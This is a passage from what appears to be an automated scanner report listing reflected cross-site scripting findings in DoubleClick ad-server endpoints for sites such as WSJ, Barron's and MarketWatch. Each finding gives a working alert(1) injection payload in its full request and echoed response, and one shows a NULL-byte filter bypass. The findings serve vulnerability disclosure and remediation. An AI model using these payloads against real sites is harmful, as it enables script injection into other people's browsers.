Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:21:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 571

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/o;241002442;0-0;1;62559705;29332-377/140;42067982/42085769/1;;~okv=;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;dc80e"style="x:expression(alert(1))"6c0363045c7;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDFGODAC">
...[SNIP]...

4.31. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/SmartMoney_Main_Front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6320"style%3d"x%3aexpression(alert(1))"6351d23f099 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6320"style="x:expression(alert(1))"6351d23f099 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/SmartMoney_Main_Front;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;ord=2886288628862886;&c6320"style%3d"x%3aexpression(alert(1))"6351d23f099=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:22:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 574

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/o;241002442;0-0;1;62559705;29332-377/140;42067982/42085769/1;;~okv=;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;&c6320"style="x:expression(alert(1))"6351d23f099=1;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDFGODAC">
...[SNIP]...

4.32. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/SmartMoney_Main_Front

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea9e"style%3d"x%3aexpression(alert(1))"aed0af3f5f was submitted in the u parameter. This input was echoed as fea9e"style="x:expression(alert(1))"aed0af3f5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/SmartMoney_Main_Front;u=;!category=;page=magsubscribe;;mc=0;tile=1;sz=378x115;ord=5215521552155215;fea9e"style%3d"x%3aexpression(alert(1))"aed0af3f5f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:21:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 577

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;241002750;0-0;0;62559705;41664-378/115;42067942/42085729/1;u=;~okv=;u=;!category=;page=magsubscribe;;mc=0;tile=1;sz=378x115;fea9e"style="x:expression(alert(1))"aed0af3f5f;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDLGODAB">
...[SNIP]...

4.33. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/tool_module

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2516c"style%3d"x%3aexpression(alert(1))"69c275b066b was submitted in the !category parameter. This input was echoed as 2516c"style="x:expression(alert(1))"69c275b066b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/tool_module;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;ord=2642264226422642;2516c"style%3d"x%3aexpression(alert(1))"69c275b066b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:21:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 437

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/t;44306;0-0;0;62335141;1510-234/31;0/0/0;;~okv=;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;2516c"style="x:expression(alert(1))"69c275b066b;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.34. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/tool_module

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a1f"style%3d"x%3aexpression(alert(1))"8ab1cd5cae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1a1f"style="x:expression(alert(1))"8ab1cd5cae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/tool_module;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;ord=2642264226422642;&d1a1f"style%3d"x%3aexpression(alert(1))"8ab1cd5cae4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:22:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 440

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/t;44306;0-0;0;62335141;1510-234/31;0/0/0;;~okv=;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;&d1a1f"style="x:expression(alert(1))"8ab1cd5cae4=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.35. http://ad.doubleclick.net/adj/allthingsd.com/general [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/allthingsd.com/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41629'-alert(1)-'cfc3eba9754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/allthingsd.com/general;tile=1;sz=300x100;ord=5629598903469741?&41629'-alert(1)-'cfc3eba9754=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/about/kara-swisher/ethics/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:34:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;211715823;0-0;0;16721520;3823-300/100;31527772/31545648/1;;~okv=;tile=1;sz=300x100;;41629'-alert(1)-'cfc3eba9754=1;~aopt=6/1/ff/1;~sscs=%3fhttp://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=316429710&mt=8&s=143441">
...[SNIP]...

4.36. http://ad.doubleclick.net/adj/allthingsd.com/kara_singlepost [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/allthingsd.com/kara_singlepost

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4972'-alert(1)-'37c8b0d0a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/allthingsd.com/kara_singlepost;tile=1;sz=300x100;ord=7205884598661214?&a4972'-alert(1)-'37c8b0d0a60=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kara.allthingsd.com/20110513/dear-yahoo-board-your-investors-are-on-line-2-and-theyre-not-happy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:23:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;211715823;0-0;0;16718698;3823-300/100;31527772/31545648/1;;~okv=;tile=1;sz=300x100;;a4972'-alert(1)-'37c8b0d0a60=1;~aopt=6/1/ff/1;~sscs=%3fhttp://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=316429710&mt=8&s=143441">
...[SNIP]...

4.37. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/barrons.com/daily_barronstake

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28cf6'%3bf8b0d88d9d was submitted in the !category parameter. This input was echoed as 28cf6';f8b0d88d9d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;28cf6'%3bf8b0d88d9d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:34:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 573

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;236395304;0-0;0;62790958;10408-336/850;40689046/40706833/1;;~aopt=0/ff/ff/ff;~fdr=240892763;0-0;0;46249204;10408-336/850;42039043/42056830/1;;~okv=;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;28cf6';f8b0d88d9d;~aopt=2/1/ff/1;~sscs=%3fhttp://calamos.com/GrowthWorks">
...[SNIP]...

4.38. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/barrons.com/daily_barronstake

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6385e'%3balert(1)//d36868e77a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6385e';alert(1)//d36868e77a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;&6385e'%3balert(1)//d36868e77a4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:34:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 587

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;236395304;0-0;0;62790958;10408-336/850;40689046/40706833/1;;~aopt=0/ff/ff/ff;~fdr=240892763;0-0;0;46249204;10408-336/850;42039043/42056830/1;;~okv=;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;&6385e';alert(1)//d36868e77a4=1;~aopt=2/1/ff/1;~sscs=%3fhttp://calamos.com/GrowthWorks">
...[SNIP]...

4.39. http://ad.doubleclick.net/adj/barrons.com/survey [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/barrons.com/survey

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82c81'-alert(1)-'2dfd7f2477e was submitted in the !category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/barrons.com/survey;!category=82c81'-alert(1)-'2dfd7f2477e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/barrons.com/columnist;!category=;biz=1053;;s=8_10001;mc=0;tile=3;sz=300x250;ord=2817281728172817;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 416
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:41 GMT
Expires: Sat, 14 May 2011 10:31:41 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/v;231254172;0-0;0;25648719;255-0/0;42027515/42045302/1;;~okv=;!category=82c81'-alert(1)-'2dfd7f2477e;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/onlinecontrol2_OOTB">
...[SNIP]...

4.40. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/front_nonsub

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da49b'-alert(1)-'818ab72d4b9 was submitted in the !category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/interactive.wsj.com/front_nonsub;!category=;;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=6698669866986698;da49b'-alert(1)-'818ab72d4b9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub;!category=;;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=6698669866986698;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:09:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 405

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/b;207642204;5-0;0;29743509;4307-300/250;42034612/42052399/1;;~okv=;!category=;;mc=b2pfreezone;tile=8;sz=336x280,300x250;da49b'-alert(1)-'818ab72d4b9;~aopt=6/1/ff/1;~sscs=%3fhttp://lpsummit.dowjones.com">
...[SNIP]...

4.41. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/brokerdock

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 974bb'-alert(1)-'8599316508e was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/brokerdock;s=974bb'-alert(1)-'8599316508e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 439
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:30:26 GMT
Expires: Sat, 14 May 2011 10:30:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;46413550;255-0/0;36796821/36814699/1;;~okv=;s=974bb'-alert(1)-'8599316508e;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.42. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/brokerdock

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001fc0f'-alert(1)-'57189850f8e was submitted in the u parameter. This input was echoed as 1fc0f'-alert(1)-'57189850f8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/marketwatch.com/brokerdock;u=%001fc0f'-alert(1)-'57189850f8e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 51904
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:13:58 GMT
Expires: Sat, 14 May 2011 10:13:58 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
://ad.doubleclick.net/activity;src=1363789;stragg=1;v=1;pid=46413550;aid=240691320;ko=0;cid=41978572;rid=41996359;rv=1;rn=3125182;";
this.swfParams = 'src=1363789&rv=1&rid=41996359&=%001fc0f'-alert(1)-'57189850f8e&';
this.renderingId = "41996359";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

4.43. http://ad.doubleclick.net/adj/marketwatch.com/frontpage [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/frontpage

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2415'-alert(1)-'77ea14b7b01 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/frontpage;u=a2415'-alert(1)-'77ea14b7b01 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 469
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:14:01 GMT
Expires: Sat, 14 May 2011 10:14:01 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;13112443;255-0/0;36796821/36814699/1;u=a2415'-alert(1)-'77ea14b7b01;~okv=;u=a2415'-alert(1)-'77ea14b7b01;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.44. http://ad.doubleclick.net/adj/marketwatch.com/markets_futuremovers [p39 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/markets_futuremovers

Issue detail

The value of the p39 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47048'-alert(1)-'ca7e230a304 was submitted in the p39 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

